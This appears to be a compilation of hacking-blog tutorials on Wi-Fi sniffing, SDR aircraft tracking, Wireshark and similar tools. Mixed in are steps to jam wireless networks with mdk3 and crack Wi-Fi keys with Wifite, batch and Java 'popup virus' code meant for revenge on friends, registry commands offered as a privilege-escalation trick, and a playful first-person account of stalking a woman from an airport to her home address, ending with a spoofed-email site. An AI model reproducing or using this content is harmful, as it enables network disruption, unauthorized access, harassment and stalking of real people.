Sniffing wireless networks without rooting your phone..

Sniffing from an android phone can be an great advantage when it comes to testing corporate security as it is easy to smuggle a phone into a building instead of a laptop or a computer.The main problem with wireless sniffing on android phones is that you might need root access to do so. As rooting voids your warranty, most users don't prefer to root their phones. So we started searching for alternative software that can do the task without root access. The 2 most effective tools from the lot are tpacketCapture and Wi-Fi PCAP Capture.

Wi-Fi PCAP Capture is based on kismet and its usage is available at https://www.kismetwireless.net/android-pcap/ where as tpacketCapture is developed by taosoftware co,ltd. 
Wi-Fi PCAP Capture is open sourced where as tpacketCapture is copyright protected. 
Wi-Fi PCAP Capture requires an external wireless card which will not work if your phone doesn't have OTG compatibility where as tpacketCapture uses the inbuilt wireless card of your phone which means that tpacketCapture will work on eventually any out of the box phone.
Both these apps save the captured data in the form of .pcap file which can be then analyzed in Wireshark. The one thing that both these apps lack was the ability to analyze the captured packets. over all these apps performed well in the tests but we did notice that Wi-Fi PCAP only worked with particularity phones and external wireless card as stated on their official website

Note:-
You will have to choose a location to save the captured files or else they will be saved to the default location which might be a problem if your phone memory is really low.

Using mdk3 to kill wireless networks

mdk3 is a network stress testing tool. It is basically a proof of concept tool which is can be used for exploitation of the weaknesses of  IEEE 802.11 protocol. It is like the LOIC for wireless networks.

How to?

  1. open a new terminal window and type airmon-ng start wlan0 (To start the monitoring mode on your wireless card.).
  2. Now type mdk3 mon0 d -c[channels on which the router is transmitting] and hit enter.
  3. If you have another USB wireless card you can do the same for it as well, it will be like attempting a DDOS on wireless networks.

Note:-
For more options type mdk3 --fullhelp and hit enter.

Creating graphs with Casefile

CaseFile is a compact version of Maltego. It is used to gather and sort information in the form of graphs which is helpful to cops and investigators for analysis of raw information. 


How to?

  1. Open a new terminal window & type casefile and hit enter.
  2. Now click on menu button and select new.
  3. From the pallet drag and drop entities.There is a wide range of entity categories to choose from.
  4. To create a relationship among the entities click just out side the boarder of the entity and extend the arrow to other entities which you want to relate to. For two way entity relationship do the process twice.
  5. Save the graph for future use by clicking on save from the menu.

Note:-
The graph shown as example is imaginary.

Comparative study of rtl1090 and adsb#

The two most used ADSB decoders are adsb# and rtl1090. These decoders can be widely used with interface software like adsbscope and virtual radar. And both these decoders work with the nooelec dongle. 

How they look?
The user interface of rtl1090 looks more like some tech from the spy movies, where as adsb# looks more like any other software that runs on windows.

What's under the skin?
rtl1090 decodes the data in binary, where as the adsb# decodes the data in normal form which is decimal.

What ports are used?
adsb# uses port 47806, while rtl1090 uses port 31001 for the data transfer.


How did they perform in tests conducted at HCAK_Labs?
We tried out both these decoders with a bunch of different interface software on a intel i3-3120M with 8 GB RAM. In majority of the tests rtl1090 was analyzed with packet drop issues while adsb# worked flawlessly in most test conditions but it didn't really work well with virtual radar.

   

Virtual Radar: Sharing the an SDR data online

As we discussed in the article  tracking airplanes with SDR we found another cool software which allows you to share the captured data online. Virtual Radar is a hosting interface software i.e it allows us to host the data online. For example we will be using rtl1090 instead of adsb#. The only difference between them is that rtl1090 decodes the data in the form of binary. 

How to?
  1. After installing the software, run rtl1090 first with administrator privilege.
  2. Now leave rtl1090 running then run virtual radar.
  3. Now click on tools and then options. After that click on receivers set the format to AVR or Beast RAW feed and the port number to 31001 and click OK.( click on test connection if you want to make sure that everything is working properly)
  4. Now click on the url which appears above feed status.
  5. Now to find out more details about the plane select it by clicking on it. 

  6. you can used http://127.0.0.1/VirtualRadar/mobile.html,
http://127.0.0.1/VirtualRadar/desktop.html and http://127.0.0.1/VirtualRadar/settings.html as per your requirement.
Note:-
If the software doesn't work you will need to download a few files from the following link.



Deep web:The unseen part of the web..

The deep web is the web which consist of onion sites these sites are a part of the internet yet unable to most users. Onion sites cannot be accessed through your default web browser.This part of the web is often used

by governments, hackers, etc. In other words a perfect area to host stuff which is not legal . To access these sites you would require tor browser.
These sites can be searched using domain search engines like duckduckgo and onion city. These are special search engines which are used to search content of the dark web.
Now you must be thinking that to launch your own drug selling portal. But but but I would like to warn you that some has already tried this foolish idea. It was known as silk road. And they were foolish enough to think that they can never be caught. But soon the authorities banned it even form the deep web. 

For links you can refer the following link.


Disclaimer:-
We don't support drugs, guns or any other illegal activities. 

Scanning frequency band..

To scan a frequency band with an SDR we will need a python tool known as rtlsdr-scanner which is present in the kali-linux-sdr package. This is a simple tool which creates a frequency to levels graph which can be used for statistical analysis. If you are using a version of Kali Linux other than 5.0 you might have to run the command apt-get install kali-linux-sdr to get all the tools of the package.

How to?

  1. Open the terminal window and type rtlsdr-scanner and hit enter.
  2. Now set the start and stop range of the frequency.
  3. Then click on start to generate the graph.
  4. At the end you will get a graph which you can use for analysis.
Note:-
To find out if you have the sdr pacakge installed you can check for Kali Linux /wireless attacks/Software Defined Radio.

Listening to WFM radio......

Mostly SDR is similar to a radio receiver which can be used to listen to the transmissions on any frequency. In simple words it is like a radio receiver present on police cars, boats and small airplanes. 

Requirements:-
  1. Sdr dongle(antenna + front end)
  2. SDR#(decoder and interface)
If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?
  1. After extracting the files, run the intall.bat file.
  2. After the files are downloaded, open the sdrsharp folder and run the sdrsharp application program. 
  3. Now hit the configure button and then hit close.


  4. Then select WFM and hit an the play button. If it doesn't work adjust the rf gain.
  5. Now change the frequency to your desired frequency by clicking on the frequency(in example the frequency is 98.3 Mhz).


Note:-
I will not advice you to listen on frequency used by the police department and other services.

Tracking Airplanes with sdr....

ADSB is the shot form of Automatic Dependent Surveillance–Broadcast is a kind of packet sent out by every plane in the sky this packet helps the ground station to locate an aircraft in the air.All aircraft transponders transmit data at the frequency 1090 MHz. To receive this transmissions one needs a receiver for this frequency - an ADS-B-receiver. The main flaw in this system is that there is no encryption of packets which mean anyone with the right setup can track planes.


Requirements:-
  1. Sdr dongle(antenna + front end)
  2. adsbsharp(decoder)
  3. adsbscope(interface software)



setup

If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?

  1. First from the sdrsharp package run the adsb# application( Just hit on start don't change anything).
  2. Now keep the adsb# running and open the adscscope application. Now click on other and then click on Network setup.
  3. Now configure your decoder by selecting adsb# and your machine by clicking on local host.
  4. Hit close and exit and go to network and select raw data client.
  5. Now after a few minutes you will see a few planes on the map and their details will be displayed on  the right panel.



Note:-
The dongle used in the demonstration is only a receiver and hence it cannot send anything thus you don't need any special permission for using it.
  

Sniffing with Wireshark!!!

Wireshark is a network protocol analyzer which helps you to
tshark-i mon0
 sniff, store and analyze network traffic. It is built on top of tshark but displays everything in a more systematic way . It is available for almost all operating systems. The software consist of various filters which are used to filter specific packets which you want to analyze.

Now whenever you start Wireshark you will have to select an interface for the list of interfaces. This decides that what all traffic you will be able to capture. To capture all the traffic in air with your wireless chip you can select the monitoring mode enabled card. To capture the all the traffic on a specific frequency you can also select your rtl-sdr.
using mon0 interface.
The best thing about Wireshark is that it can be integrated with different types of hardware and software. There are millions of Wireshark filters so you cannot memorize all of them but you can always refer to them whenever you want on https://www.wireshark.org/.


The only way to learn Wireshark is by experimenting. To get a copy you can download form the following link.

Automated wireless hacking: wifi hacking the easy way!!!!!

Wifite is a python script which automates all the required process for wireless hacking. This script attempts all the wireless exploits one by one till it gets the key of the wireless network. The best tool for lazy hackers. :p



Requirements:-

  • A wireless card with monitoring mode.
  • Wifite.py file (It is already installed in Kali Linux).


we will use Kali Linux for our demonstration.

How to?

  1. Open a new terminal type wifite(in case of Kali for other distributions you might have to type ./python wifite.py ) 
  2. Select your interface name, in our case we only had one interface so we can skip this step.
  3. Now select the network which you want to hack we only have one network so we will give 1.
  4. Now wait till the script cracks the WEP or WAP key to give you an WEP key for the network.


Note:-

If you want to set the parameter at the beginning you can do that as well which means that the script will use these parameter from the beginning  to check parameters you can type wifite -h .
You can also crack the hash if the script is unable to do so with other hash cracking scripts like hashcat and aircrack-ng.


Coding popup virus....

Viruses have always been an important part of hacking for a long time. These malicious programs can help you perform specific commands on any victim computer. These are very helpful when you want to take revenge from a friend.  So we decided to teach you how to code popup viruses which are non lethal to the victim's computer.

How to?

  1. The first step to code a nice virus is deciding what you want to display on your friend's computer. The commonly used phrases are "you are a dick" ," pay for your sins " and "f@## you!" , now the first thing to remember that these messages should be in string data type.
  2. The second part to create a popup virus is the infinite loop, this is a loo that has no end point. For example if you are coding a java virus your popup command should be inside while(true) {  }.
  3. The last step to save the file with suitable extension. For example if you are creating a bat file then you should save the program as filename.bat or if you are coding a java virus then you will need to save the files in the form of a jar executable  file.
Sample codes:-

Java code:-
 private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {           
        while(true)
        {
        JOptionPane.showMessageDialog(this,"fuck you","pay for your sins",3);
        }

    } 

Batch code:-
:top
@echo off
msg * (you fucked my life)
cls
msg * (now my turn)

cls
GOTOtop

Note:-
For developing java viruses we will advice you to use netbeans as it makes the process of coding a lot easy. And as far as .bat scripting is considered notepad is the best tool you can use.

In batch viruses you can use code like 
start iexplore.exe "www.google.com"

START %SystemRoot%\system32\notepad.exe
to open notepad and internet explorer. 

You can also use the code by a google researcher to get admin access on windows:
reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

Stalking advanced:Personal information gatheringher the fun way.

Disclaimer:-
This post is not based on any real life incident. The characters in this post are imaginary. Resemblance might be a coincidence. Through this post we don't intend to disrespect women or men in any way. This post is for mere entertainment and understanding of personal information gathering.  


At an airport, I saw a girl she was beautiful. I was standing behind her in the line to get the boarding cards. When she got her boarding card I was able to get a gaze on it. I saw some major details about her.
After getting my boarding card, I sat down at the lounge. I switched on my laptop. I was eager to know about her so I started searching, first I wanted to know where she was going so I searched the her fight  number on http://planefinder.net/ it was Goa
This is just a random search
then I was curious about her social life so I searched on  https://pipl.com/ for all the profiles with her name. I got her Facebook profile where I saw her about and found out her dad's name in family. So to find out how hard my ass will be kicked if I asked for her I searched her dad's name in linkedin.com this was a little horrifying. 
Then I went through her Facebook profile to find out her address. And luckily she had added a location of her house in a post which she had made public so I searched the coordinates in Google which gave me her address.

Then I opened https://emkei.cz/ to send her a fake mail but something stopped me. I found out that she was taken as I saw her boyfriend who came late and was on another flight. I switched off by laptop and when towards gate 5 to board the aircraft. Thinking that the people should have some representation that  can differentiate single and taken.